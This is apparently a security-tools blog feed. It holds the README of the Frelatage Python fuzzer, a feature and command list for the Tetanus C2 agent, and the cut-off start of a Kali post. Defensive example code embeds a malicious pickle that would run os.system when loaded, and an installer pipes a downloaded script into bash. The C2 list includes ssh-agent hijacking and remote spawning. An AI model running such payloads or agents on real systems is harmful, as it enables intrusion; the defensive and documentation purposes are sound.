href="https://blogger.googleusercontent.com/img/a/AVvXsEiKCpLvDt8ohflu5wxVoJAvfGKpdQsz_NCeTIZuYbWYjQdhxPozVKhyMotTauXVpTzP3YbZ61x80OzU1BqnSvW-Ju7mWZzTapi5cjEdzQOH4bb9fkGVY4Kna-F93fBB75zI-XUHf3ohwcgQKXyfpfMPYVWlKcLxzW0LH-H_XvikPLo03R9nZ9s_nICD"><img alt="" border="0" id="BLOGGER_PHOTO_ID_7100792676888970978" 
src="https://blogger.googleusercontent.com/img/a/AVvXsEiKCpLvDt8ohflu5wxVoJAvfGKpdQsz_NCeTIZuYbWYjQdhxPozVKhyMotTauXVpTzP3YbZ61x80OzU1BqnSvW-Ju7mWZzTapi5cjEdzQOH4bb9fkGVY4Kna-F93fBB75zI-XUHf3ohwcgQKXyfpfMPYVWlKcLxzW0LH-H_XvikPLo03R9nZ9s_nICD=s320" /></a> <br /> <code>pip3 install frelatage</code><br /> <i>Current release : <a href="https://github.com/Rog3rSm1th/Frelatage/releases" rel="nofollow" target="_blank" title="0.0.7">0.0.7</a></i><br /></p> <p align="center" dir="auto"> <a href="https://github.com/Rog3rSm1th/Frelatage/blob/main/doc/frelatage_demo.gif?raw=true" rel="nofollow" target="_blank" title="The Python Fuzzer that the world deserves <g-emoji alias=snake class=g-emoji fallback-src=https://github.githubassets.com/images/icons/emoji/unicode/1f40d.png>&#128013;</g-emoji> (13)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhz9SJRq419M_Gdkr3Aqjx-Cfl3a8aeH-aRdNIVb3QwXhf4JQj21_0rvWpUJy4XFuiNVb-RZrJUvWlgIZqX1TxJjnELcibepnIl2Ww5WrUf3RF9qbGUyV7m21HkH7_X73UgZd2DekelJ45Ge6LbaqXRBpPWvSCXMbyi_UvX-hadhDcMWVyngI_mK9LC"><img alt="" border="0" height="156" id="BLOGGER_PHOTO_ID_7100792697909328594" src="https://blogger.googleusercontent.com/img/a/AVvXsEhz9SJRq419M_Gdkr3Aqjx-Cfl3a8aeH-aRdNIVb3QwXhf4JQj21_0rvWpUJy4XFuiNVb-RZrJUvWlgIZqX1TxJjnELcibepnIl2Ww5WrUf3RF9qbGUyV7m21HkH7_X73UgZd2DekelJ45Ge6LbaqXRBpPWvSCXMbyi_UvX-hadhDcMWVyngI_mK9LC=w640-h156" width="640" /></a> </p> <p dir="auto">Frelatage is a coverage-based Python fuzzing library which can be used to fuzz python code. 
The development of Frelatage was inspired by various other fuzzers, including <a href="https://github.com/google/AFL" rel="nofollow" target="_blank" title="AFL">AFL</a>/<a href="https://github.com/AFLplusplus/AFLplusplus" rel="nofollow" target="_blank" title="AFL++">AFL++</a>, <a href="https://github.com/google/atheris" rel="nofollow" target="_blank" title="Atheris">Atheris</a> and <a href="https://github.com/fuzzitdev/pythonfuzz" rel="nofollow" target="_blank" title="PythonFuzz">PythonFuzz</a>. The main purpose of the project is to take advantage of the best features of these fuzzers and gather them together into a new tool in order to efficiently fuzz python applications.</p> <p dir="auto"><strong>DISCLAIMER</strong> : This project is at the alpha stage and can still cause many unexpected behaviors. Frelatage should not be used in a production environment at this time.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto">Requirements</h2> <p dir="auto"><a href="https://www.python.org/" rel="nofollow" target="_blank" title="Python 3">Python 3</a></p> <h2 dir="auto">Installation</h2> <h4 dir="auto">Install with pip (recommended)</h4> <div><pre><code>pip3 install frelatage</code></pre></div> <h4 dir="auto">Or build from source</h4> <p dir="auto">Recommended for developers. 
It automatically clones the main branch from the frelatage repo, and installs from source.</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto"><pre><code># Automatically clone the Frelatage repository and install Frelatage from source<br />bash <(wget -q https://raw.githubusercontent.com/Rog3rSm1th/Frelatage/main/scripts/autoinstall.sh -O -)</code></pre></div> <p dir="auto">As with any fetch-and-pipe-to-bash installer, download the script and read it before running it, or clone the repository and install from the checkout instead.</p> <h2 dir="auto">How it works</h2> <p dir="auto">The idea behind the design of Frelatage is the usage of a genetic algorithm to generate mutations that will cover as much code as possible. The functioning of a fuzzing cycle can be roughly summarized with this diagram:</p> <div><pre><code>graph TB<br /><br /> m1(Mutation 1) --&gt; |input| function(Fuzzed function)<br /> m2(Mutation 2) --&gt; |input| function(Fuzzed function)<br /> mplus(Mutation ...) --&gt; |input| function(Fuzzed function)<br /> mn(Mutation n) --&gt; |input| function(Fuzzed function)<br /> <br /> function --&gt; generate_reports(Generate reports)<br /> generate_reports --&gt; rank_reports(Rank reports) <br /> rank_reports --&gt; select(Select n best reports)<br /> <br /> select --&gt; |mutate| nm1(Mutation 1) &amp; nm2(Mutation 2) &amp; nmplus(Mutation ...) &amp; nmn(Mutation n)<br /> <br /> subgraph Cycle mutations<br /> direction LR<br /> m1<br /> m2<br /> mplus<br /> mn<br /> end<br /> <br /> subgraph Next cycle mutations<br /> direction LR<br /> nm1<br /> nm2<br /> nmplus<br /> nmn<br /> end<br /> <br /> style function fill:#5388e8,stroke:white,stroke-width:4px<br /></code></pre></div> <h2 dir="auto">Features</h2> <h4 dir="auto">Fuzzing different argument types:</h4> <ul dir="auto"> <li>String</li> <li>Int</li> <li>Float</li> <li>List</li> <li>Tuple</li> <li>Dictionary</li> </ul> <h4 dir="auto">File fuzzing</h4> <p dir="auto">Frelatage allows you to fuzz a function by passing a file as input.</p> <h4 dir="auto">Fuzzer efficiency</h4> <ul dir="auto"> <li>Corpus</li> <li>Dictionary</li> </ul> <h2 dir="auto">Use Frelatage</h2> <h4 dir="auto">Fuzz a classical parameter</h4> <div class="highlight highlight-source-python notranslate position-relative overflow-auto"><pre><code>import frelatage<br />import my_vulnerable_library<br /><br />def MyFunctionFuzz(data):<br /> my_vulnerable_library.parse(data)<br /><br />input = frelatage.Input(value="initial_value")<br />f = frelatage.Fuzzer(MyFunctionFuzz, [[input]])<br />f.fuzz()</code></pre></div> <h4 dir="auto">Fuzz a file parameter</h4> <p dir="auto">Frelatage gives you the possibility to fuzz file type input parameters. 
To initialize the value of these files, you must create files in the input folder (<code>./in</code> by default).</p> <p dir="auto">If we want to initialize the value of a file used to fuzz, we can do it like this:</p> <div><pre><code>echo "initial value" > ./in/input.txt</code></pre></div> <p dir="auto">And then run the fuzzer:</p> <div class="highlight highlight-source-python notranslate position-relative overflow-auto"><pre><code>import frelatage<br />import my_vulnerable_library<br /><br />def MyFunctionFuzz(data):<br /> my_vulnerable_library.load_file(data)<br /><br />input = frelatage.Input(file=True, value="input.txt")<br />f = frelatage.Fuzzer(MyFunctionFuzz, [[input]])<br />f.fuzz()</code></pre></div> <h4 dir="auto">Load several files to a corpus at once</h4> <p dir="auto">If you need to load several files into a corpus at once (useful with a large corpus), you can use Frelatage's built-in function <code>load_corpus</code>. This function returns a list of inputs.</p> <p dir="auto"><code>load_corpus(directory: str, file_extensions: list) -> list[Input]</code></p> <ul dir="auto"> <li>directory: Subdirectory of the input directory (relative path), e.g. <code>./</code>, <code>./images</code></li> <li>file_extensions: List of file extensions to include in the corpus entries, e.g. 
<code>["jpeg", "gif"]</code>, <code>["pdf"]</code></li> </ul> <div class="highlight highlight-source-python notranslate position-relative overflow-auto"><pre><code>import frelatage<br />import my_vulnerable_library<br /><br /># One argument per corpus list passed to the Fuzzer: data comes from corpus_1, data2 from corpus_2<br />def MyFunctionFuzz(data, data2):<br /> my_vulnerable_library.load_file(data)<br /> my_vulnerable_library.load_file(data2)<br /><br /># Load every file in the ./in directory<br />corpus_1 = frelatage.load_corpus(directory="./")<br /># Load every .gif/.jpeg file in the ./in/images subdirectory<br />corpus_2 = frelatage.load_corpus(directory="./images", file_extensions=["gif", "jpeg"])<br /><br />f = frelatage.Fuzzer(MyFunctionFuzz, [corpus_1, corpus_2])<br />f.fuzz()</code></pre></div> <h4 dir="auto">Fuzz with a dictionary</h4> <p dir="auto">You can copy one or more dictionaries located <a href="https://github.com/Rog3rSm1th/Frelatage/tree/main/dictionaries" rel="nofollow" target="_blank" title="here">here</a> in the directory dedicated to dictionaries (<code>./dict</code> by default).</p> <h4 dir="auto">Differential fuzzing</h4> <p dir="auto"><a href="https://en.wikipedia.org/wiki/Differential_testing" rel="nofollow" target="_blank" title="Differential fuzzing">Differential fuzzing</a> is a popular software testing technique that attempts to detect bugs by providing the same input to multiple libraries/programs and observing differences in their behaviors. 
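</p>
<p dir="auto">As an added example (not the project's json_differential_fuzzer.py, which needs the third-party <code>ujson</code>), the following compares <code>json.loads</code> with <code>ast.literal_eval</code>, two standard-library parsers that accept overlapping literal syntax. It tries every single-token insertion and single-character deletion of a few seeds and keeps one witness per distinct outcome pattern. The seeds and tokens are constructed; exception types are collapsed on purpose, because a JSONDecodeError on one side and a SyntaxError on the other is not a divergence worth reporting, whereas one side accepting what the other rejects, or both accepting with different values, is.</p>

```python
import ast
import json
from dataclasses import dataclass
from typing import Callable, Dict, Iterator, Optional, Sequence, Tuple

Target = Callable[[str], object]
Outcome = Tuple[str, str]          # ("ok", repr(result)) or ("error", "")


def observe(target: Target, data: str) -> Outcome:
    """Normalise one target's behaviour so results from different libraries are comparable."""
    try:
        return ("ok", repr(target(data)))
    except Exception:
        return ("error", "")


@dataclass(frozen=True)
class Divergence:
    data: str                         # the input the targets disagree on
    outcomes: Tuple[Outcome, ...]     # one outcome per target, in target order


def compare(targets: Sequence[Target], data: str) -> Optional[Divergence]:
    """Run every target on the same input; report when they do not all agree."""
    outcomes = tuple(observe(t, data) for t in targets)
    return None if len(set(outcomes)) == 1 else Divergence(data, outcomes)


def single_edits(seed: str, tokens: Sequence[str]) -> Iterator[str]:
    """Every string one edit away from seed: a token spliced in anywhere, or one character dropped."""
    for i in range(len(seed) + 1):
        for tok in tokens:
            yield seed[:i] + tok + seed[i:]
    for i in range(len(seed)):
        yield seed[:i] + seed[i + 1:]


def differential_fuzz(targets: Sequence[Target], seeds: Sequence[str],
                      tokens: Sequence[str]) -> Dict[Tuple[Outcome, ...], Divergence]:
    """Exhaustively try single edits of each seed; keep the first witness of each outcome pattern."""
    found: Dict[Tuple[Outcome, ...], Divergence] = {}
    for seed in seeds:
        for candidate in single_edits(seed, tokens):
            d = compare(targets, candidate)
            if d is not None:
                found.setdefault(d.outcomes, d)
    return found


# Constructed corpus: seeds both parsers accept, plus tokens probing syntax only one of them knows
# (a trailing comma, NaN and true for json, a single-quoted string for ast).
SEEDS = ['[1, 2]', '{"a": 1}', '"x"']
TOKENS = [',', 'NaN, ', 'true, ', "'y', ", '0']
PARSERS = [json.loads, ast.literal_eval]

if __name__ == "__main__":
    for d in differential_fuzz(PARSERS, SEEDS, TOKENS).values():
        print("%-16r json=%s ast=%s" % (d.data, d.outcomes[0], d.outcomes[1]))
```

<p dir="auto">The witnesses it finds are the kind of disagreement differential fuzzing exists for: a trailing comma that <code>json</code> rejects and <code>ast</code> accepts, or <code>NaN</code> and <code>true</code> that <code>json</code> turns into values while <code>ast</code> refuses them. When the two targets are supposed to implement the same specification, every witness is a bug in at least one of them; here they merely document where two lenient parsers differ, which is exactly what an attacker looks for when one component validates input and another consumes it.</p>
<p dir="auto">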
You will find an example <a href="https://github.com/Rog3rSm1th/Frelatage/blob/main/examples/json_fuzzer/json_differential_fuzzer.py" rel="nofollow" target="_blank" title="here">here</a> of a use of differential fuzzing with Frelatage with the <code>json</code> and <code>ujson</code> libraries.</p> <h4 dir="auto">Examples</h4> <p dir="auto">You can find more examples of fuzzers and corpus in the <a href="https://github.com/Rog3rSm1th/Frelatage/tree/main/examples" rel="nofollow" target="_blank" title="examples directory">examples directory</a>.</p> <ul dir="auto"> <li><a href="https://rog3rsm1th.github.io/posts/fuzzing-python-libraries-frelatage/" rel="nofollow" target="_blank" title="Fuzzing Pillow with Frelatage to find bugs and vulnerabilities">Fuzzing Pillow with Frelatage to find bugs and vulnerabilities</a></li> </ul> <h2 dir="auto">Reports</h2> <p dir="auto">Each crash is saved in the output folder (<code>./out</code> by default), in a folder named: <code>id:&lt;crash ID&gt;,err:&lt;error type&gt;,err_pos:&lt;error&gt;,err_file:&lt;error file&gt;</code>.</p> <p dir="auto">The report directory is in the following form:</p> <div><pre><code> ├── out<br /> │ ├── id:&lt;crash ID&gt;,err:&lt;error type&gt;,err_file:&lt;error file&gt;,err_pos:&lt;err_pos&gt;<br /> │ ├── input<br /> │ ├── 0<br /> │ ├── &lt;inputfile1&gt;<br /> │ ├── ...<br /> │ ├── ...<br /></code></pre></div> <h4 dir="auto">Read a crash report</h4> <p dir="auto">Inputs passed to a function are serialized using the <a href="https://docs.python.org/3/library/pickle.html" rel="nofollow" target="_blank" title="pickle">pickle</a> module before being saved in the <code>&lt;report_folder&gt;/input</code> file. It is therefore necessary to deserialize it to be able to read the contents of the file. 
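</p>
<p dir="auto">One caveat before deserialising anything: <code>pickle.load</code> calls whatever constructors the data names, so a report copied from a shared or untrusted fuzzing box is itself an attack surface. The added example below (not Frelatage's read_report.py) writes a report-style <code>input</code> file the way a fuzzer would and reads it back through a restricted unpickler that only resolves a handful of builtin container types. The directory layout is assumed, and the malicious pickle is constructed by hand to show what the restriction blocks.</p>

```python
import builtins
import io
import os
import pickle
import tempfile
from typing import Any, List

# Constructed malicious pickle, protocol 0: GLOBAL os.system, push "echo pwned", REDUCE.
# Never hand something like this to pickle.loads(): deserialising it runs the command.
MALICIOUS_PICKLE = b"cos\nsystem\n(S'echo pwned'\ntR."


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that resolves only a few harmless builtins by name.
    str, bytes, int, float, bool, None, list, tuple and dict need no global lookup at all,
    so a fuzzer's argument lists made of those types load without ever reaching find_class."""

    ALLOWED = {"builtins": {"set", "frozenset", "bytearray", "complex", "range", "slice"}}

    def find_class(self, module: str, name: str) -> Any:
        if name in self.ALLOWED.get(module, ()):
            return getattr(builtins, name)
        raise pickle.UnpicklingError("refusing to resolve %s.%s" % (module, name))


def safe_loads(blob: bytes) -> Any:
    """Deserialise under the allow-list; data naming any other global is rejected."""
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def is_safe_pickle(blob: bytes) -> bool:
    """True when the blob loads under the allow-list, False when it tried a forbidden name."""
    try:
        safe_loads(blob)
        return True
    except pickle.UnpicklingError:
        return False


def dump_input(args: Any) -> bytes:
    """Serialise the way a fuzzer stores the arguments of a crashing call."""
    return pickle.dumps(args)


def new_report_dir() -> str:
    """Fresh scratch directory standing in for one id:...,err:... crash folder."""
    return tempfile.mkdtemp(prefix="frelatage-report-")


def write_report(report_dir: str, args: List[Any]) -> str:
    """Assumed layout: the pickled argument list lives in the 'input' file of the crash folder."""
    path = os.path.join(report_dir, "input")
    with open(path, "wb") as fh:
        fh.write(dump_input(args))
    return path


def read_report(path: str) -> List[Any]:
    """What a hardened report reader does instead of a bare pickle.load()."""
    with open(path, "rb") as fh:
        return RestrictedUnpickler(fh).load()


if __name__ == "__main__":
    report = write_report(new_report_dir(), ["REC\x03k=v", 2, b"\xff"])
    print("crashing arguments:", read_report(report))
    print("malicious pickle accepted?", is_safe_pickle(MALICIOUS_PICKLE))
```

<p dir="auto">The allow-list is the whole defence: a crash input built from strings, numbers and containers round-trips unchanged, while the constructed pickle that names <code>os.system</code> is refused at the GLOBAL opcode, before the REDUCE that would have run it. Reports that need richer types should be stored in a non-executable format such as JSON with bytes base64-encoded, which removes the problem rather than filtering it.</p>
<p dir="auto">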
This action can be performed with <a href="https://github.com/Rog3rSm1th/Frelatage/blob/main/scripts/read_report.py" rel="nofollow" target="_blank" title="this script">this script</a>.</p> <div><pre><code>./read_report.py input</code></pre></div> <h2 dir="auto">Configuration</h2> <p dir="auto">There are two ways to set up Frelatage:</p> <h4 dir="auto">Using the environment variables</h4> <table> <tbody><tr> <th>ENV Variable</th> <th>Description</th> <th>Possible Values</th> <th>Default Value</th> </tr> <tr> <td><strong>FRELATAGE_DICTIONARY_ENABLE</strong></td> <td>Enable the use of mutations based on <a href="https://www.kitploit.com/search/label/Dictionary" target="_blank" title="dictionary">dictionary</a> elements</td> <td><code>1</code> to enable, <code>0</code> otherwise</td> <td><code>1</code></td> </tr> <tr> <td><strong>FRELATAGE_TIMEOUT_DELAY</strong></td> <td>Delay in seconds after which a call to the fuzzed function is aborted and reported as a TimeoutError</td> <td><code>1</code> - <code>20</code></td> <td><code>2</code></td> </tr> <tr> <td><strong>FRELATAGE_INPUT_FILE_TMP_DIR</strong></td> <td>Temporary folder where input files are stored</td> <td>absolute path to a folder, e.g. <code>/tmp/custom_dir</code></td> <td><code>/tmp/frelatage</code></td> </tr> <tr> <td><strong>FRELATAGE_INPUT_MAX_LEN</strong></td> <td>Maximum size of an input variable in bytes</td> <td><code>4</code> - <code>1000000</code></td> <td><code>4094</code></td> </tr> <tr> <td><strong>FRELATAGE_MAX_THREADS</strong></td> <td>Maximum number of simultaneous threads</td> <td><code>8</code> - <code>50</code></td> <td><code>8</code></td> </tr> <tr> <td><strong>FRELATAGE_MAX_CYCLES_WITHOUT_NEW_PATHS</strong></td> <td>Number of cycles without new paths found after which we go to the next stage</td> <td><code>10</code> - <code>50000</code></td> <td><code>5000</code></td> </tr> <tr> <td><strong>FRELATAGE_INPUT_DIR</strong></td> <td>Directory containing the initial input files. 
It needs to be a relative path (to the path of the fuzzing file)</td> <td>relative path to a folder, e.g. <code>./in</code></td> <td><code>./in</code></td> </tr> <tr> <td><strong>FRELATAGE_DICTIONARY_DIR</strong></td> <td>Default directory for dictionaries. It needs to be a relative path (to the path of the fuzzing file)</td> <td>relative path to a folder, e.g. <code>./dict</code></td> <td><code>./dict</code></td> </tr> <tr> <td><strong>FRELATAGE_DEBUG_MODE</strong></td> <td>Enable the debug mode (show the error when Frelatage itself crashes)</td> <td><code>1</code> to enable, <code>0</code> otherwise</td> <td><code>1</code></td> </tr> </tbody></table> <p dir="auto">A configuration example:</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto"><pre><code>export FRELATAGE_DICTIONARY_ENABLE=1 &&<br />export FRELATAGE_TIMEOUT_DELAY=2 &&<br />export FRELATAGE_INPUT_FILE_TMP_DIR="/tmp/frelatage" &&<br />export FRELATAGE_INPUT_MAX_LEN=4096 &&<br />export FRELATAGE_MAX_THREADS=8 &&<br />export FRELATAGE_MAX_CYCLES_WITHOUT_NEW_PATHS=5000 &&<br />export FRELATAGE_INPUT_DIR="./in" &&<br />export FRELATAGE_DICTIONARY_DIR="./dict" &&<br />python3 fuzzer.py</code></pre></div> <h4 dir="auto">Passing arguments to the fuzzer</h4> <div class="highlight highlight-source-python notranslate position-relative overflow-auto"><pre><code>import frelatage <br /><br />def myfunction(input1_string, input2_int):<br /> pass<br /><br />input1 = frelatage.Input(value="initial_value")<br />input2 = frelatage.Input(value=2)<br /><br />f = frelatage.Fuzzer(<br /> # The method you want to fuzz<br /> method=myfunction,<br /> # Corpus: one list per argument of the fuzzed method<br /> corpus=[[input1], [input2]],<br /> # Number of threads<br /> threads_count=8,<br /> # Exceptions that will be taken into account (a tuple: note the trailing comma)<br /> exceptions_whitelist=(OSError,),<br /> # Exceptions that will not be taken into account<br /> exceptions_blacklist=(),<br /> # Directory where the error reports will be stored<br /> output_directory="./out",<br /> # Enable or disable silent mode<br /> silent=False<br />)<br />f.fuzz()</code></pre></div> <h2 dir="auto">Risks</h2> <p dir="auto">Please keep in mind that, similarly to many other computationally-intensive tasks, fuzzing may put strain on your <a href="https://www.kitploit.com/search/label/Hardware" target="_blank" title="hardware">hardware</a> and on the OS. In particular:</p> <ul dir="auto"> <li> <p dir="auto">Your CPU will run hot and will need adequate cooling. In most cases, if cooling is insufficient or stops working properly, CPU speeds will be automatically throttled. 
That said, especially when fuzzing on less suitable hardware (laptops, smartphones, etc.), it's not entirely impossible for something to blow up.</p> </li> <li> <p dir="auto">Targeted programs may end up erratically grabbing gigabytes of memory or filling up <a href="https://www.kitploit.com/search/label/Disk%20Space" target="_blank" title="disk space">disk space</a> with junk files. Frelatage tries to enforce basic memory limits, but can't prevent each and every possible mishap. The bottom line is that you shouldn't be fuzzing on systems where the prospect of data loss is not an acceptable risk.</p> </li> <li> <p dir="auto">Fuzzing involves billions of reads and writes to the filesystem. On modern systems, this will usually be heavily cached, resulting in fairly modest "physical" I/O - but there are many factors that may alter this equation. It is your responsibility to monitor for potential trouble; with very heavy I/O, the lifespan of many HDDs and SSDs may be reduced.</p> <p dir="auto">A good way to monitor disk I/O on Linux is the <code>iostat</code> command:</p> </li> </ul> <div><pre><code>$ iostat -d 3 -x -k [...optional disk ID...]</code></pre></div> <h2 dir="auto">About Me/Hire me</h2> <p dir="auto">I am Rog3rSm1th, I am 21 years old and I'm a French computer and <a href="https://www.kitploit.com/search/label/Cybersecurity" target="_blank" title="cybersecurity">cybersecurity</a> enthusiast. I like developing tools (OSINT, Fuzzing...) and playing CTFs/Wargames. 
To learn more about me and my projects, just click <a href="https://github.com/Rog3rSm1th/Rog3rSm1th" rel="nofollow" target="_blank" title="here">here</a>.</p> <p dir="auto">➜ If you want to hire me for one of your projects (Programming, cybersecurity...), just contact me at <a href="mailto:r0g3r5@protonmail.com" rel="nofollow" target="_blank" title="r0g3r5@protonmail.com">r0g3r5@protonmail.com</a> and we will assess your needs together.</p> <h2 dir="auto">Contact</h2> <p dir="auto">For any remark, suggestion, bug report, or if you found a bug using Frelatage, you can contact me at <a href="mailto:r0g3r5@protonmail.com" rel="nofollow" target="_blank" title="r0g3r5@protonmail.com">r0g3r5@protonmail.com</a> or on Twitter <a href="https://twitter.com/Rog3rSm1th" rel="nofollow" target="_blank" title="@Rog3rSm1th">@Rog3rSm1th</a>.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/Rog3rSm1th/Frelatage" rel="nofollow" target="_blank" title="Download Frelatage">Download Frelatage</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-5631385508025307542022-05-21T08:30:00.009-04:002022-05-21T08:30:00.238-04:00Tetanus - Mythic C2 Agent Targeting Linux And Windows Hosts Written In Rust<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi94BWPJjKMo7YqWhvHVqFCUF6MPVYoJEWK6vJ_S6SJA4UyKJJYCLetMBWPW-bTSK1NH_te-0l9tPy8VCSwGboqZ6MtuYcnbvemfsnVR3fDQxnrmu2MZC9j6kH9oD3IRVSxwKRL4eHzKIoWYhxVIumpi7HPk9GXp44lhPXya7I-pY_vCVmC2g-lPdCw/s460/tetanus.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="422" data-original-width="460" height="368" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi94BWPJjKMo7YqWhvHVqFCUF6MPVYoJEWK6vJ_S6SJA4UyKJJYCLetMBWPW-bTSK1NH_te-0l9tPy8VCSwGboqZ6MtuYcnbvemfsnVR3fDQxnrmu2MZC9j6kH9oD3IRVSxwKRL4eHzKIoWYhxVIumpi7HPk9GXp44lhPXya7I-pY_vCVmC2g-lPdCw/w400-h368/tetanus.png" width="400" /></a></div><p><br /></p> <p dir="auto">Tetanus is a <a href="https://www.kitploit.com/search/label/Windows" target="_blank" title="Windows">Windows</a> and Linux C2 agent written in Rust.</p> <h1 dir="auto">Installation</h1> <p dir="auto">To install Tetanus, you will need <a href="https://github.com/its-a-feature/Mythic" rel="nofollow" target="_blank" title="Mythic">Mythic</a> set up on a machine.</p> <p dir="auto">In the Mythic root directory, use <code>mythic-cli</code> to install the agent.</p> <div class="highlight highlight-source-shell position-relative overflow-auto"><pre><code>sudo ./mythic-cli install github https://github.com/MythicAgents/tetanus<br />sudo ./mythic-cli payload start tetanus</code></pre></div> <p dir="auto">Tetanus supports the <code>http</code> C2 profile:</p> <div class="highlight highlight-source-shell position-relative overflow-auto"><pre><code>sudo ./mythic-cli install github https://github.com/MythicC2Profiles/http<br />sudo ./mythic-cli c2 start http</code></pre></div><span><a name='more'></a></span><div><br /><h2 dir="auto">Features</h2> <ul dir="auto"> <li>Background job management</li> <li>Built-in ssh client <ul dir="auto"> <li>Connect to a machine and download/upload files between that machine and Mythic</li> <li>Get <a href="https://www.kitploit.com/search/label/Directory" target="_blank" 
title="directory">directory</a> listings from machines using sftp</li> <li>Spawn agents on machines using ssh</li> <li>ssh-agent hijacking</li> </ul> </li> <li>Streaming portscan</li> <li>Stand up TCP redirectors</li> </ul> <h2 dir="auto">Future Additions</h2> <ul dir="auto"> <li>v0.2.0 <ul class="contains-task-list"> <li class="task-list-item"><input class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Socks proxying</li> <li class="task-list-item"><input class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Windows token manipulation</li> <li class="task-list-item"><input class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> More browser script integration</li> <li class="task-list-item"><input class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> DNS C2 profile</li> <li class="task-list-item"><input class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> p2p capabilities</li> <li class="task-list-item"><input class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> In <a href="https://www.kitploit.com/search/label/Memory" target="_blank" title="memory">memory</a> shellcode execution <code>execute-shellcode</code></li> </ul> </li> </ul> <h2 dir="auto">General Commands</h2> <table> <tbody><tr> <th>Command</th> <th>Syntax</th> <th>Description</th> </tr> <tr> <td>cat</td> <td><code>cat [file]</code></td> <td>Output the contents of a file.</td> </tr> <tr> <td>cd</td> <td><code>cd [new directory]</code></td> <td>Change directory.</td> </tr> <tr> <td>cp</td> <td><code>cp [source] [destination]</code></td> <td>Copy a file from [source] to [destination].</td> </tr> <tr> <td>download</td> <td><code>download [path]</code></td> <td>Download a file from the target system (supports relative paths).</td> </tr> <tr> <td>exit</td> <td><code>exit</code></td> <td>Exit the agent.</td> </tr> <tr> <td>getenv</td> <td><code>getenv</code></td> <td>Get the current environment variables.</td> </tr> <tr> 
<td>getprivs</td> <td><code>getprivs</code></td> <td>Get the privileges of the agent session.</td> </tr> <tr> <td>jobkill</td> <td><code>jobkill [job id]</code></td> <td>Shut down a running background job.</td> </tr> <tr> <td>jobs</td> <td><code>jobs</code></td> <td>List currently running background jobs.</td> </tr> <tr> <td>ls</td> <td><code>ls [directory]</code></td> <td>List files or directories (supports relative paths).</td> </tr> <tr> <td>mkdir</td> <td><code>mkdir [directory]</code></td> <td>Make a new directory.</td> </tr> <tr> <td>mv</td> <td><code>mv [source] [destination]</code></td> <td>Move a file from [source] to [destination] (supports relative paths).</td> </tr> <tr> <td>portscan</td> <td><code>portscan [popup]</code></td> <td>Scan a list of IPs for open ports.</td> </tr> <tr> <td>ps</td> <td><code>ps</code></td> <td>Get a list of currently running processes.</td> </tr> <tr> <td>pwd</td> <td><code>pwd</code></td> <td>Print working directory.</td> </tr> <tr> <td>redirect</td> <td><code>redirect [&lt;bindhost&gt;:&lt;bindport&gt;:&lt;connecthost&gt;:&lt;connectport&gt;]</code></td> <td>Set up a TCP <a href="https://www.kitploit.com/search/label/Redirector" target="_blank" title="redirector">redirector</a> on the remote system.</td> </tr> <tr> <td>rm</td> <td><code>rm [path]</code></td> <td>Remove a file or directory (supports relative paths).</td> </tr> <tr> <td>setenv</td> <td><code>setenv [name] [value]</code></td> <td>Set environment variable [name] to [value].</td> </tr> <tr> <td>shell</td> <td><code>shell [command]</code></td> <td>Run a shell command with <code>bash -c</code> on Linux or <code>cmd.exe /c</code> on Windows in a new thread.</td> </tr> <tr> <td>sleep</td> <td><code>sleep [interval][units] [jitter]</code></td> <td>Set the sleep interval and jitter (supports unit suffixing).</td> </tr> <tr> <td>ssh</td> <td><code>ssh [popup]</code></td> <td>Use ssh to execute commands, download/upload files or grab directory listings.</td> </tr> <tr> <td>ssh-agent</td> 
<td><code>ssh-agent [-c &lt;socket&gt;] [-d] [-l]</code></td> <td>Connect to running ssh agent sockets on the host or list identities.</td> </tr> <tr> <td>ssh-spawn</td> <td><code>ssh-spawn [popup]</code></td> <td>Spawn a Mythic agent on a remote host using ssh.</td> </tr> <tr> <td>unsetenv</td> <td><code>unsetenv [var]</code></td> <td>Unset an environment variable.</td> </tr> <tr> <td>upload</td> <td><code>upload [popup]</code></td> <td>Upload a file to the host machine.</td> </tr> </tbody></table> <h3 dir="auto">Windows-specific Commands</h3> <table> <tbody><tr> <th>Command</th> <th>Syntax</th> <th>Description</th> </tr> <tr> <td>powershell</td> <td><code>powershell [command]</code></td> <td>Run a command using <code>powershell.exe /c</code> in a new thread.</td> </tr> </tbody></table> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/MythicAgents/tetanus" rel="nofollow" target="_blank" title="Download Tetanus">Download Tetanus</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-61418413464236827092022-05-17T00:57:00.000-04:002022-05-17T00:57:02.168-04:00Kali Linux 2022.2 - Penetration Testing and Ethical Hacking Linux Distribution<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiTtZYI97lcNISgbv6KTnLdshFnFSINgQKZz4t-_pVsVzx0nu3jsDwgrMFpj_PI4qQzy-hB6MN13RyHlyU7Nxz0oWbOtOJjuwINGmxsaXLbf2-a-zvJEcU8omMaPzEwWWHW9Uz_5vuyngv36ADG843jjC2AsWp4CT7T6HrfkliCtjmyRVvdDmmM_MO/s1200/banner-2022.2-release.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="628" data-original-width="1200" height="334" 
